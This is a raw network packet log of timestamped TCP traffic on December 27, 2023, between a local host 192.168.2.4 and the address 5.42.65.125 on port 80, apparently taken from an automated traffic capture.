Dec 27, 2023 17:57:26.004280090 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.004292011 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.004318953 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.004363060 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.004380941 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.004410982 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.004426003 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.004435062 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.004437923 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.004486084 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.004519939 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.004534006 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.004542112 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.004549026 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.004563093 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.004571915 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.004585028 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.004637003 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.005233049 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.005273104 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.005289078 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.005300999 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.005337954 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.005357981 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.005376101 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.005389929 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.005403996 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.005418062 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.005422115 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.005426884 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.005455971 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.005470037 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.005477905 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.005486012 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.005511045 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.005517960 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.005520105 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.005530119 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.005569935 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.006145954 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.006162882 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.006176949 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.006216049 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.006223917 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.006241083 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.006268024 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.006272078 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.006287098 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.006313086 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.006320953 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.006330013 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.006345987 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.006357908 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.006385088 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.006431103 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.006448030 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.006462097 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.006475925 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.006489992 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.006493092 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.006519079 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.007105112 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.007148981 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.007164955 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.007191896 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.007195950 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.007210970 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.007221937 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.007262945 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.007718086 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.007735014 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.007747889 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.007764101 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.007777929 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.007785082 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.007792950 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.007807016 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.007810116 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.007844925 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.007853985 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.007869005 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.007885933 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.007900953 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.007901907 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.007916927 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.007929087 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.007930994 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.007946968 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.007951975 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.008002043 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.008044958 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.008331060 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.008347988 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.008362055 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.008373976 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.008378029 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.008394957 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.008413076 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.008434057 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.008498907 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.008513927 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.008526087 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.008542061 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.008554935 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.008569956 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.008579969 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.008589029 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.008594990 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.008605003 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.008618116 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.008626938 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.008646965 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.008671999 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.008699894 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.009279013 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.009295940 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.009330988 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.009337902 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.009347916 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.009363890 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.009402990 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.009408951 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.009418011 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.009433985 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.009442091 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.009449005 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.009509087 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.009516001 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.009574890 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.009588957 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.009589911 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.009603977 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.009613037 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.009650946 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.009676933 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.010180950 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.010236979 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.010252953 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.010293007 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.010308027 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.010309935 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.010390043 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.010467052 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.010570049 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.010584116 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.010598898 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.010606050 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.010612965 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.010622025 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.010636091 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.010659933 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.010730028 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.010749102 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.010765076 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.010771990 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.010798931 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.010806084 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.010806084 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.010813951 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.010822058 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.010863066 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.011425972 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.011442900 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.011466980 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.011487961 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.011531115 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.011538029 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.011548042 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.011555910 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.011563063 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.011625051 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.011629105 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.011640072 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.011655092 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.011667967 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.011682987 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.011691093 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.011697054 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.011710882 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.011714935 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.011729002 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.011734009 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.011782885 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.012382030 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.012398958 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.012413979 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.012445927 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.012562990 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.012578011 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.012597084 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.012610912 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.012613058 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.012628078 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.012636900 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.012640953 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.012650013 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.012656927 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.012664080 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.012671947 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.012685061 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.012693882 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.012710094 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.012794018 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.013319016 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.013340950 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.013371944 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.013386965 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.013392925 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.013396978 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.013447046 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.013849974 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.013870001 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.013897896 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.013915062 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.013930082 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.013955116 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.013973951 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.013974905 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.014014959 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.014014959 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.014096022 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.014115095 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.014127970 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.014198065 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.014203072 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.014220953 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.014234066 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.014247894 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.014261961 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.014265060 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.014286041 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.014580965 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.014600992 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.014626026 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.014632940 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.014695883 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.014710903 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.014755011 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.014769077 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.014786005 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.014801979 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.014816999 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.014832020 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.014832020 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.014842033 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.014849901 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.014892101 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.014906883 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.014908075 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.014919043 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.014983892 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.015512943 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.015532970 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.015589952 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.015630960 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.015649080 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.015659094 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.015702009 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.015718937 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.015736103 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.015786886 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.015801907 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.015815973 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.015824080 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.015832901 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.015847921 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.015855074 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.015861988 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.015885115 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.015909910 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.015964985 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.016534090 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.016555071 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.016586065 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.016597033 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.016619921 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.016633987 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.016639948 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.016751051 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.016767979 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.016788960 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.016798973 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.016808033 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.016824007 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.016833067 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.016870022 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.016908884 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.016925097 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.016932011 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.016948938 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.016956091 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.016963005 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.016966105 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.016972065 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.016979933 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.016995907 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.017009974 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.017028093 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.017047882 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.017618895 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.017672062 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.017755032 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.017766953 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.017771959 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.017787933 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.017806053 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.017808914 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.017831087 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.017843962 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.017858982 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.017867088 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.017874956 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.017883062 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.017894983 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.017920971 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.017929077 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.017936945 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.017946005 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.017947912 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.018003941 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.018647909 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.018718004 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.018733978 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.018747091 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.018763065 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.018769979 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.018779039 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.018795967 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.018796921 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.018812895 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.018819094 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.018826962 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.018841982 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.018842936 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.018860102 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.018866062 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.018877029 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.018893957 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.018896103 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.018932104 CET	49738	80	192.168.2.4	5.42.65.125
